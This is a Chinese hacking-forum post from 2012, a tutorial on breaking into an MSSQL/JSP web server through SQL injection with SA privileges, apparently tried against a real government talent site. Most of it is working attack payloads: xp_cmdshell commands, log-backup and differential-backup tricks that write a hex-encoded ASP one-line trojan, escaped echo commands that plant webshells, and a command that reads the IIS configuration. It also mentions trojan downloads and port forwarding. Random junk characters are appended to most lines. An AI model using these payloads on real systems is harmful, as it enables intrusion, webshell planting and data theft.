找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1989|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
9 W+ c- J' z3 h: A7 u0 Z7 X: X: v$ `

" V' Y" X' C+ c$ ]* m                                                             欢迎高手访问指导,欢迎新手朋友交流学习。2 b4 |: m, o. Z. [

9 y$ i+ {" V. h$ d/ C                                                                 
+ p: O" `8 v& t: G7 ^                                                                 
1 K! ]' {3 U/ R3 S3 e; y                                                                  论坛: http://www.90team.net/8 X/ @' V7 Y7 y

1 g; E5 {2 k+ v9 F  ^
7 r4 f5 o" T' @: B5 J9 |% s% C0 Q2 N" G; W9 D! D
友情检测国家人才网
+ o7 k! \& y4 }6 `
) D# B. N* R$ G. ~# o# Q. N* L
9 W- i# d7 \* O  u9 {9 l/ n内容:MSSQL注入SA权限不显错模式下的入侵$ ?( _% U7 K' `( @% y/ q/ W

  H# p0 z; m' n7 N- k) b. p' P8 ?5 }4 W8 h5 f6 Y
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。3 c2 C& I6 v, f, `7 E

. ~, w1 [) i' g. l2 y& s. r我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
3 u) k  q" E4 I4 l$ V
% z3 T* I6 G, T" h2 \& ]9 r
! W: g# b$ ?- r1 ]这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。' o, |$ _$ W% y/ f7 T

% @+ v1 J5 o# W思路:
9 J5 p2 `5 i( v' }5 s$ B5 ?* Q
3 S. i: x: n$ H首先:
. b2 k: ]+ ]0 N9 m7 J
' l# P9 _- z( r9 H* [通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。5 Q& p/ ]5 V* A8 D) `3 c

: D  k) R# ~4 _2 l8 Z4 {1.日志备份获得Webshell
- c) L/ @" s' P0 U6 J/ h/ H8 D
0 z1 a% x7 \2 @  Q/ V  x8 C2.数据库差异备份获得Webshell+ W3 A+ U% z% X& {

6 Z' ^4 y1 _/ O5 E4.直接下载免杀远控木马。
3 `  T: c; `. \8 L* [
* @% v. c- Z0 ^# ]0 J7 @+ D+ F5.直接下载LCX将服务器端口转发出来1 K1 g; Z+ X! }

+ P) J7 X( i  @! k5 ]7 L6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
4 t: {0 _! m; [/ l5 y& p
/ N8 \0 j  ]4 d# ^) d
$ Z- n7 v1 l, A8 I7 E! k
* m5 `* ~& @  F) F在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了, : _4 }& D5 G4 N5 f# I8 K' I
4 Q+ y+ N5 Y) [+ G
我直接演示后面一个方法
- f  C, P0 s; Q5 x  s8 W$ O: o  R
9 R2 m# M: s; J0 p3 h# Y$ a2 R# R+ D- J. q  k
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL ( \5 H# B+ s9 m

9 K5 ~$ x' s$ I" }2 s
) ~- s( N- `! o3 j7 e; `
; i2 y& @4 R4 }1 l4 _& J! \; x6 ?5 O6 A8 w
◆日志备份:5 R7 r+ u) a+ }
5 X  k) h& ]1 Y( Z6 q; ~% o$ H4 }; d$ Z
2 B) Z3 M- j1 Q  A% R
1. 进行初始备份
' f+ G) L1 {8 ]8 F( b; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--' n3 I8 a3 I+ }* y' i

& I1 _+ T0 ^3 e" E! }) W* F2. 插入数据
  e: {. \" X. C1 `) @;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--/ b+ e$ o! \7 o
  C  j/ D- L# e0 K6 d9 ?4 j, r
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>3 H  _% H/ L6 u
  5 f+ ?, E! u- ?# x0 e7 i
3. 备份并获得文件,删除临时表. L% H. c" L: ]/ Z/ c5 H
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
( o: e$ U- `3 a
7 N3 ~2 q( r- I& Z9 N+ Q) P
" \0 M( M/ ?3 A% _) A, I
& O& g$ Y0 m3 B% u' V3 v& w# a◆数据库差异备份$ N4 \% \3 l' J5 Q) @

+ T0 O/ m" A2 ^- e4 }& v(1. 进行差异备份准备工作
8 A9 e5 `2 }! s: P9 ?, M' }9 ]
0 I+ P! F1 i% ]( }8 z" `: _8 C;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--3 b. K  K; Z* n" k0 J3 @4 K

  y' F5 W6 r" e3 y5 v上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码* K6 I( D! C( b3 x3 ~7 V3 F
( ^# y2 f! t, q, E, \

9 F" v$ S2 `' M# W+ [6 m+ C+ Q  D(2. 将数据写入到数据库
( y9 L! k4 H; a: D. [  i;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
4 M0 X" s. J# K) k% \" k+ t9 Y6 N
6 ]0 n- S: D' e4 p: H" o3 W2 @6 p0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>6 a0 S' f3 g* |5 P5 h
. [' w; T6 i5 Y! U& w' q0 V7 X- {
3. 备份数据库并清理临时文件: x. ~) v9 Z( e8 _: \0 W
/ q7 L* z- S: p* c" R
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
* ?' b* ?; r. l( l( ]* y) E
* ]2 d( q7 ?+ }8 v. r0x633A5C746573742E617370  为 c:\test.asp  删除临时文件 0 |2 R1 Q* j* m3 v0 m& R% m
/ o* G8 q5 r# }$ W
- b- `- t8 x, o  e3 i3 P
5 X/ k( J! E6 g; ?" d. ]) b% E
用^转义字符来写ASP(一句话木马)文件的方法:   8 Y/ W' o( G( N' u+ x3 {* p2 ?1 ~% b

. _0 Q% D% o, `# \8 l1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--; R: |3 G& `  l- ~. i4 R
8 t5 {5 K. V% b
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp 9 D, ~; L& E' f3 _1 r6 J
* R; G7 X' @3 [0 H4 X' C
读取IIS配置信息获取web路径, O3 }; t, L- X3 s: g

5 v2 A. s% {- ^9 N     # [- t% ^+ k! x) _
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--* g7 b8 M# r* b: w. E

- H" ?) M' W" g" e& D! b& ?执行命令- n' G2 V; z9 }3 M6 A  G+ p8 z
     
* o3 U  C4 q7 `& G9 F     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
/ |, O0 b9 p+ x& E. n
) x* `$ F: ]4 I/ e9 f- j8 o5 F3 n+ ?
6 W1 \. b( ]) n2 A" T' D0 i/ |+ o
2 N* K9 R9 d% Z, C+ y+ T
# J% S8 T  Q5 `1 Q/ b
* y/ n+ f2 l0 D  q  F

3 w, J" ~, N- B: B
' @5 o: o7 c: n. s4 P% v! q2 \5 G4 ^$ g5 v- t$ N% X% W
1 `: G- D& f4 \( l; G, r1 L
2 g5 a. G: N( X

2 A3 V" E* o! p, B; {" l7 I+ Q: L, _+ z4 x  }  i# U+ M
+ c9 S1 l! j  z' r# y

* B1 b9 {( Q& \$ @" |, R. J9 C( v, f8 B- B

* l5 U5 O: l# F5 [1 u8 [7 ^  ~0 D, r& X- q( L3 f4 C# s

$ r* B. n5 B- S) e/ q( B  }0 x" q& o: B1 W/ B# |# G

7 S, A+ M1 p+ r
- Z# h! Z9 o9 o# w& U7 N# c
) t$ K0 v( D" b7 P( j( ~
% f: W$ I' R" S1 H' S. l7 w6 x4 c. P, b9 B. |% T
+ |6 g, Q5 G! j, k( |& [4 }. w+ m
+ K& H' |* t0 @3 `
7 t: _9 F3 s; B$ a* H+ v+ [

% t- y% n) F6 A0 I. ^, ~. L
* V$ M; X: A; `6 \+ {5 Y5 R4 x- B' c8 \9 c- R

( Y, Y5 e5 ~. M4 J+ e) k" J* j8 Y
/ H/ \7 f+ p# `; V1 E4 A
5 L+ M' n1 D& X" \" r0 P' Y, B4 @: Q7 n8 J3 ~' |; e
& i$ ^; w* r5 {8 z$ T. e/ S, I
% q7 P% k4 `' g1 _/ J9 c" n
/ Z" h6 X% {8 ~# l7 f8 a
$ T: {: t( k" h# y4 Z- L& ~

1 U" ~0 s. G3 f( a! v& Q2 n5 a9 G# N

* U. Z; {0 B# g6 d
& V- N- T; ?& M
* G: Y, f6 a1 ^9 I8 ^0 x! v# }+ K9 i) B7 z: Z( [  T' U2 B

% z7 ^* [" p# ^# B5 I" H' v
$ X+ _; v9 e/ B: Y
$ A7 b6 A3 Q8 D: U& R8 I
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表